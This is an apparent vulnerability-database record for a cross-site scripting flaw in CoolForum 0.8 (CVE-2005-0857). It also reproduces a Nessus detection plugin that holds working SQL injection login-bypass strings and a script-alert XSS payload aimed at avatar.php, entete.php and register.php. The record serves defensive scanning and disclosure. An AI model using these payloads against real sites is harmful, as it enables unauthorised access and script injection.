ID OSVDB:14951 Type osvdb Reporter Romano(romano_45@hotmail.com) Modified 2005-03-17T19:47:52
Description
Vulnerability Description
CoolForum contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate 'img' variables upon submission to the 'avatar.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.
Solution Description
Upgrade to version 0.8.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
Short Description
CoolForum contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate 'img' variables upon submission to the 'avatar.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.
{"type": "osvdb", "published": "2005-03-17T19:47:52", "href": "https://vulners.com/osvdb/OSVDB:14951", "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/", "score": 4.3}, "viewCount": 0, "edition": 1, "reporter": "Romano(romano_45@hotmail.com)", "title": "CoolForum avatar.php img Variable XSS", "affectedSoftware": [{"operator": "eq", "version": "0.8", "name": "CoolForum"}], "enchantments": {"score": {"value": 5.1, "vector": "NONE", "modified": "2017-04-28T13:20:11", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-0857"]}, {"type": "nessus", "idList": ["COOLFORUM_XSS_SQL.NASL"]}], "modified": "2017-04-28T13:20:11", "rev": 2}, "vulnersScore": 5.1}, "references": [], "id": "OSVDB:14951", "lastseen": "2017-04-28T13:20:11", "cvelist": ["CVE-2005-0857"], "modified": "2005-03-17T19:47:52", "description": "## Vulnerability Description\nCoolForum contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate 'img' variables upon submission to the 'avatar.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## Solution Description\nUpgrade to version 0.8.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nCoolForum contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate 'img' variables upon submission to the 'avatar.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.\n## References:\nVendor URL: http://www.coolforum.net/\nSecurity Tracker: 1013474\n[Related OSVDB ID: 14953](https://vulners.com/osvdb/OSVDB:14953)\n[Related OSVDB ID: 14952](https://vulners.com/osvdb/OSVDB:14952)\nISS X-Force ID: 19758\n[CVE-2005-0857](https://vulners.com/cve/CVE-2005-0857)\nBugtraq ID: 12852\n", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:24:35", "description": "Cross-site scripting (XSS) vulnerability in avatar.php for CoolForum 0.8 and earlier allows remote attackers to inject arbitrary web script or HTML via the img parameter.", "edition": 6, "cvss3": {}, "published": "2005-05-02T04:00:00", "title": "CVE-2005-0857", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-0857"], "modified": "2017-07-11T01:32:00", "cpe": ["cpe:/a:coolforum:coolforum:0.8"], "id": "CVE-2005-0857", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0857", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:coolforum:coolforum:0.8:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-01-20T09:38:17", "description": "The remote host is running a version of CoolForum that suffers from\nmultiple input validation vulnerabilities. \n\n - Multiple SQL Injection Vulnerabilities\n Due to a failure to properly sanitize user-input supplied \n through the 'pseudo' parameter of the 'admin/entete.php' script\n and the 'ilogin' parameter of the 'register.php' script, an\n attacker may be able to manipulate SQL queries and view\n arbitrary database contents provided PHP's 'magic_quotes_gpc'\n setting is disabled.\n\n - A Cross-Site Scripting Vulnerability\n It is possible to inject arbitrary script and HTML code into the\n 'img' parameter of the 'avatar.php' script. An attacker can\n exploit these flaws to cause code to run on a user's browser\n within the context of the remote site, enabling him to steal\n authentication cookies, access data recently submitted by the\n user, and the like.", "edition": 24, "published": "2005-03-22T00:00:00", "title": "CoolForum Multiple Vulnerabilities (SQLi, XSS)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0858", "CVE-2005-0857"], "modified": "2005-03-22T00:00:00", "cpe": [], "id": "COOLFORUM_XSS_SQL.NASL", "href": "https://www.tenable.com/plugins/nessus/17597", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description) {\n script_id(17597);\n script_version(\"1.22\");\n\n script_cve_id(\"CVE-2005-0857\", \"CVE-2005-0858\");\n script_bugtraq_id(12852);\n\n script_name(english:\"CoolForum Multiple Vulnerabilities (SQLi, XSS)\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that suffers from\nmultiple issues.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of CoolForum that suffers from\nmultiple input validation vulnerabilities. \n\n - Multiple SQL Injection Vulnerabilities\n Due to a failure to properly sanitize user-input supplied \n through the 'pseudo' parameter of the 'admin/entete.php' script\n and the 'ilogin' parameter of the 'register.php' script, an\n attacker may be able to manipulate SQL queries and view\n arbitrary database contents provided PHP's 'magic_quotes_gpc'\n setting is disabled.\n\n - A Cross-Site Scripting Vulnerability\n It is possible to inject arbitrary script and HTML code into the\n 'img' parameter of the 'avatar.php' script. An attacker can\n exploit these flaws to cause code to run on a user's browser\n within the context of the remote site, enabling him to steal\n authentication cookies, access data recently submitted by the\n user, and the like.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://securitytracker.com/alerts/2005/Mar/1013474.html\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to CoolForum version 0.8.1 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/03/22\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/03/18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n \n summary[\"english\"] = \"Checks for cross-site scripting and SQL injection vulnerabilities in CoolForum\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n \n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:80, php: 1);\n\n\nforeach dir (cgi_dirs()) {\n # Grab index.php.\n res = http_get_cache(item:string(dir, \"/index.php\"), port:port, exit_on_fail: 1);\n\n # If it's CoolForum...\n if (egrep(string:res, pattern:\"Powered by .*CoolForum\")) {\n # Try the SQL injections.\n #\n # nb: these particular exploits may not be particularly\n # interesting, but they at least demonstrate the \n # install is vulnerable.\n #\n # - requires PHP's magic_quotes to be off.\n postdata = string(\n \"action=login&\",\n \"password=&\",\n # nb: this forces a match for id=12345, user \"nessus\", who has\n # an empty password and has already been confirmed. It\n # does not, though, add the user to any databases.\n \"pseudo='Union%20SELECT%20'12345','nessus','','','1'%20FROM%20CF_config%23\"\n );\n init_cookiejar();\n r = http_send_recv3(method: 'POST', item: dir+\"/admin/entete.php\", \n version: 11, data: postdata, port: port,\n add_headers: make_array(\"Content-Type\", \"application/x-www-form-urlencoded\"));\n # If we get a CoolForumID cookie, there's a problem.\n if (get_http_cookie(name: \"CoolForumID\")) {\n security_warning(port);\n set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n # - only in CoolForum 0.8 and it requires CoolForum's confirmation \n # by mail option to be enabled (it is by default).\n r = http_send_recv3(method: 'GET', port: port, exit_on_fail: 1,\n item:string(dir, \"/register.php?\",\n \"action=confirm&\",\n # nb: this is an empty string encoded as md5; eg, 'md5(\"\")'.\n \"s=d41d8cd98f00b204e9800998ecf8427e&\",\n # nb: this forces a match for id=12345, user \"nessus\", who has\n # an empty password and has already been confirmed. It\n # does not, though, add the user to any databases.\n \"login='Union%20SELECT%20'12345','nessus','','','1'%20FROM%20CF_config%23\"\n ));\n # If the response indicates we've already confirmed, there's a problem.\n if (egrep(string: r[2], pattern:\"<b>Op.+ration impossible, votre inscription a d.j. .t. confirm.e!</b>\")) {\n security_warning(port);\n set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n\n # Try an XSS exploit - a simple alert to display \"Nessus was here\".\n #\n # nb: this requires PHP's display_errors to be enabled.\n xss = \"'><script>alert('Nessus was here');</script>\";\n # nb: the url-encoded version is what we need to pass in.\n exss = \"'%3E%3Cscript%3Ealert('Nessus%20was%20here')%3B%3C%2Fscript%3E\";\n r = http_send_recv3(port: port, method: 'GET', item:string(dir, \"/avatar.php?img=\", exss), exit_on_fail: 1);\n # If we see our XSS, there's a problem.\n if (egrep(string: r[2], pattern:xss)) {\n security_warning(port);\n set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}]}
